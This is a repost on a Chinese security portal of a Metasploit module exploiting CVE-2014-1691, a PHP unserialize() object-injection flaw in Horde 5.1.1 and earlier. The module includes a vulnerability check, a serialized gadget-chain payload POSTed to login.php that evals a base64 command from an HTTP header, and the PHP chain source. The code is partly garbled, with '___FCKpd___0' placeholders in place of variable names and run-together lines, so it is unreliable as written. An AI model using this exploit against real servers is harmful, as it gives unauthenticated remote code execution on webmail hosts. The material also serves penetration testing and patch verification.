首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Horde Framework Unserialize PHP Code Execution
来源:metasploit.com 作者:EgiX 发布时间:2014-03-21  
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Horde Framework Unserialize PHP Code Execution',
      'Description'    => %q{
        This module exploits a php unserialize() vulnerability in Horde <= 5.1.1 which could be
        abused to allow unauthenticated users to execute arbitrary code with the permissions of
        the web server. The dangerous unserialize() exists in the 'lib/Horde/Variables.php' file.
        The exploit abuses the __destruct() method from the Horde_Kolab_Server_Decorator_Clean
        class to reach a dangerous call_user_func() call in the Horde_Prefs class.
      },
      'Author'         =>
        [
          'EgiX', # Exploitation technique and Vulnerability discovery (originally reported by the vendor)
          'juan vazquez' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2014-1691' ],
          [ 'URL', 'http://karmainsecurity.com/exploiting-cve-2014-1691-horde-framework-php-object-injection' ],
          [ 'URL', 'https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=737149' ],
          [ 'URL', 'https://github.com/horde/horde/commit/da6afc7e9f4e290f782eca9dbca794f772caccb3' ]
        ],
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Payload'        =>
        {
          'DisableNops' => true
        },
      'Targets'        => [ ['Horde 5', { }], ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jun 27 2013'
      ))

      register_options(
        [
          OptString.new('TARGETURI', [ true, "The base path to Horde", "/horde/"])
        ], self.class)
  end

  def check
    flag = rand_text_alpha(rand(10)+20)
    res = send_request_exploit("print #{flag};die;")
    if res and res.body and res.body.to_s =~ /#{flag}/
      return Exploit::CheckCode::Vulnerable
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    print_status("#{peer} - Testing injection...")
    unless check == Exploit::CheckCode::Vulnerable
      fail_with(Failure::NotVulnerable, "#{peer} - Target isn't vulnerable, exiting...")
    end

    print_status("#{peer} - Exploiting the unserialize()...")
    send_request_exploit(payload.encoded)
  end

  def send_request_exploit(p)
    php_injection = "eval(base64_decode(
___FCKpd___0
SERVER[HTTP_CMD]));die();" payload_serialized = "O:34:\"Horde_Kolab_Server_Decorator_Clean\":2:{s:43:\"\x00Horde_Kolab_Server_Decorator_Clean\x00_server\";" payload_serialized << "O:20:\"Horde_Prefs_Identity\":2:{s:9:\"\x00*\x00_prefs\";O:11:\"Horde_Prefs\":2:{s:8:\"\x00*\x00_opts\";a:1:{s:12:\"sizecallback\";" payload_serialized << "a:2:{i:0;O:12:\"Horde_Config\":1:{s:13:\"\x00*\x00_oldConfig\";s:#{php_injection.length}:\"#{php_injection}\";}i:1;s:13:\"readXMLConfig\";}}" payload_serialized << "s:10:\"\x00*\x00_scopes\";a:1:{s:5:\"horde\";O:17:\"Horde_Prefs_Scope\":1:{s:9:\"\x00*\x00_prefs\";a:1:{i:0;i:1;}}}}" payload_serialized << "s:13:\"\x00*\x00_prefnames\";a:1:{s:10:\"identities\";i:0;}}s:42:\"\x00Horde_Kolab_Server_Decorator_Clean\x00_added\";a:1:{i:0;i:1;}}" send_request_cgi( { 'uri' => normalize_uri(target_uri.path.to_s, "login.php"), 'method' => 'POST', 'vars_post' => { '_formvars' => payload_serialized }, 'headers' => { 'Cmd' => Rex::Text.encode_base64(p) } }) end end =begin PHP chain by EgiX: http://karmainsecurity.com/exploiting-cve-2014-1691-horde-framework-php-object-injection class Horde_Config { protected
___FCKpd___0
oldConfig = "phpinfo();die;"; } class Horde_Prefs_Scope { protected
___FCKpd___0
prefs = array(1); } class Horde_Prefs { protected
___FCKpd___0
opts,
___FCKpd___0
scopes; function __construct() { $this->_opts['sizecallback'] = array(new Horde_Config, 'readXMLConfig'); $this->_scopes['horde'] = new Horde_Prefs_Scope; } } class Horde_Prefs_Identity { protected
___FCKpd___0
prefs,
___FCKpd___0
prefnames; function __construct() { $this->_prefs = new Horde_Prefs; $this->_prefnames['identities'] = 0; } } class Horde_Kolab_Server_Decorator_Clean { private
___FCKpd___0
server,
___FCKpd___0
added = array(1); function __construct() { $this->_server = new Horde_Prefs_Identity; } } $popchain = serialize(new Horde_Kolab_Server_Decorator_Clean); =end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·EaseUS Todo Backup 5.8.0.0 Har
·MS14-012 Internet Explorer Tex
·Wireless Drive v1.1.0 iOS - Mu
·Immunity Debugger 1.85 - Stack
·Quantum DXi V1000 SSH Private
·Array Networks vAPV / vxAG Cod
·Windows Media Player 11.0.5721
·Quantum DXi V1000 2.2.1 - Stat
·jetVideo 8.1.1 - Basic (.wav)
·Loadbalancer.org Enterprise VA
·Light Audio Player 1.0.14 - Me
·Quantum vmPRO 3.1.2 - Privileg
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved